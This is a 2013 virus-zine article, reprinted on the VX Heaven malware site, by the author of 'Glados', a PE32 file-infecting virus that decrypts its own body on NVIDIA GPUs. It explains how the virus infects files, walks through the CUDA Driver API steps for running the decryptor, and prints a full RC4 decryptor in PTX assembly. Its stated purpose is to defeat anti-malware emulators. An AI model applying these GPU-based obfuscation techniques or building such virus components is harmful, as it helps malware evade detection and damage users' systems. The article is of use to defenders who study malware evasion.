Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Using CUDA PTX for decryption

hh86
Valhalla #4
November 2013

[Back to index] [Comments]

About Glados

It is my first virus using NVIDIA CUDA capable GPU for decryption. It is a direct action file infector of PE32 exe files in the current directory, overwriting to their reloc data if present in the large section and enough to hold the virus body. The infected files become droppers. It is the world's first virus to decrypt code using Parallel Thread Execution code.

What is it?

Our journey begins by understading what is CUDA. Here is a good explanation in Wikipedia: "CUDA (aka Compute Unified Device Architecture) is a parallel computing platform and programming model created by NVIDIA and implemented by the graphics processing units (GPUs) that they produce. CUDA gives program developers direct access to the virtual instruction set and memory of the parallel computational elements in CUDA GPUs".

CUDA introduces CUDA C/C++ (and the possibility to extend others such as Visual C++) as the primary high-level language, and an assembly-like intermediate language between the machine code that is executed in the GPU and high-level language. The assembly language is known as Paralell Thread Execution, or PTX for short. PTX allow programmers to improve the performance in critical algorithms while also writing code that is highly portable.

Back to basics

Let's think about the source code of a program for physics that makes calculations using the CUDA GPU. The function that makes the calculation is executed in the GPU. Is is compiled from a CUDA C source code, which contains also the code to initialize the application and prepare the GPU to run the function. The function is compiled to PTX, and the PTX code is then compiled and re-optimised for better performance in the chosen target architecture.

Internally in the compiled program, the compiled PTX is stored as a "cubin" file (actually, it is an embedded ELF file). When the program starts, it passes the cubin through the CUDA runtime library or directly to the CUDA driver. Either way, the cubin file is then translated again to run in the specific instruction set in the GPU (yes, GPU have various instruction sets that can run its multiple cores).

Viruses and GPUs

The world's first virus that used the GPGPU for decryption, was W32.OGLe by roy g biv. In its analysis Peter Ferrie describes the GPU as: "unimaginable challenges for anti-malware emulators, especially given that there are two major execution environments which have quite different behaviours, and there is no easy way to determine which one is intended to be used".

CUDA GPU introduce a special challenge. As I described, those GPU can run code for different targets, and yet I haven't mentioned that it can be made to run thousands of cores using thousands of threads, concurrently! That's very scary, for them. ;)

I first learned about PTX code when I was researching to write code for my first virus ever. It's been a long time since I finally was able to purchase an NVIDIA graphic card. I decided to try it myself and wrote a simple POC to decrypt the virus using CUDA capable GPUs and PTX.

How can we do that

We use the Driver API interface instead of the CUDA Runtime API since there is a slight chance that the host system does not have it installed. Firstly we call cuInit() API to initialize the driver. The next task is finding a CUDA capable device (the system may have multiple graphic cards and they may work concurrently). We use the cuDeviceCount() API to get the count of devices that support CUDA.

If one device is found and matches the configuration require, the next step is to create a context (CUcontext) on the device, we call cuCtxCreate() API to do that, here I use CU_CTX_SCHED_BLOCKING_SYNC flag to make synchronous calls.

Now we load the module (CUmodule) in order to perform JIT compilation. Just use cuModuleLoadDataEx() and then cuModuleGetFunction() to get a "handler" (CUfunction) to call our kernel. The module is the source code of a function (or numerous functions).

The device cannot work with host memory directly, we need to allocate device memory using cuMemAlloc(). Then we copy the encrypted virus code (and in this case, the keys too) using cuMemcpyHtoD(). Then we can proceed to launch the decryptor code in the device using cuLaunchKernel().

For a code example of the whole process take a look to Glados source code.

PTX decryptor

It is an RC4 algorithm that uses 128-bit keys. I ported it from my UNIT00 virus which was x86 assembler to CUDA PTX. It looks like this:

        mov.s32         r1, 0;

fill_states:
        mov.s32         r2, s[r1];
        st.local.s8     [r2], r1;
        add.s32         r1, r1, 1;
        setp.eq.s32     p, r1, 256;
@!p     bra             fill_states;
        ld.param.s32    r9, [b];
        mov.s32         r3, 0;
        mov.s32         r1, 0;

do_permutation:
        mov.s32         r5, s[r1];
        ld.local.s8     r4, [r5];
        mov.s32         r6, r4;
        mov.s32         r7, r5;
        add.s32         r3, r3, r4;
        rem.s32         r4, r1, 16;
        add.s32         r5, r9, r4;
        ld.global.s8    r4, [r5];
        add.s32         r3, r3, r4;
        and.b32         r3, r3, 0xff;
        mov.s32         r5, s[r3];
        ld.local.s8     r4, [r5];
        st.local.s8     [r7], r4;
        st.local.s8     [r5], r6;
        add.s32         r1, r1, 1;
        setp.eq.s32     p, r1, 256;
@!p     bra             do_permutation;
        mov.s32         r1, 0;
        mov.s32         r3, 0;
        mov.s32         r8, 0;

decrypt:
        add.s32         r1, r1, 1;
        and.b32         r1, r1, 0xff;
        mov.s32         r5, s[r1];
        ld.local.s8     r4, [r5];
        mov.s32         r6, r4;
        mov.s32         r7, r5;
        add.s32         r3, r3, r4;
        and.b32         r3, r3, 0xff;
        mov.s32         r5, s[r3];
        ld.local.s8     r4, [r5];
        st.local.s8     [r7], r4;
        st.local.s8     [r5], r6;
        add.s32         r6, r6, r4;
        and.b32         r6, r6, 0xff;
        mov.s32         r5, s[r6];
        ld.local.s8     r4, [r5];
        ld.global.s8    r2, [r9+16];
        xor.b32         r4, r4, r2;
        st.global.b8    [r9+16], r4;
        add.s32         r9, r9, 1;
        add.s32         r8, r8, 1;
        setp.eq.s32     p, r8, 0000;    //virus size
@!p     bra             decrypt;
 

Interpretation of the code should be pretty straight forward to people familiar with x86 instruction set, since I didn't make use of any special instruction. With a very few exceptions: "rem" returns the modulo, "ld" is like "lods" and "st" is like "stos" instructions, I use "mov" here to set some values to zero since it uses fewer operands than "xor" (in CUDA PTX it is dst, src1, src2) but can be used as "lea" from x86 as well. The code is not optimised, the algorithm can use fewer instructions and get rid of the "local" and "global" then they become generic and the GPU checks in what range does the memory pointer falls (but that may make the process slower).

Outro

While the weakness lies in the PTX code itself because it can be retrieved and understood with minor efforts, we'll soon change that by introducing the GPU machine code whithin the CPU machine code itself.

hh86
1 November 2013
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxheaven.org aka vx.netlux.org
deenesitfrplruua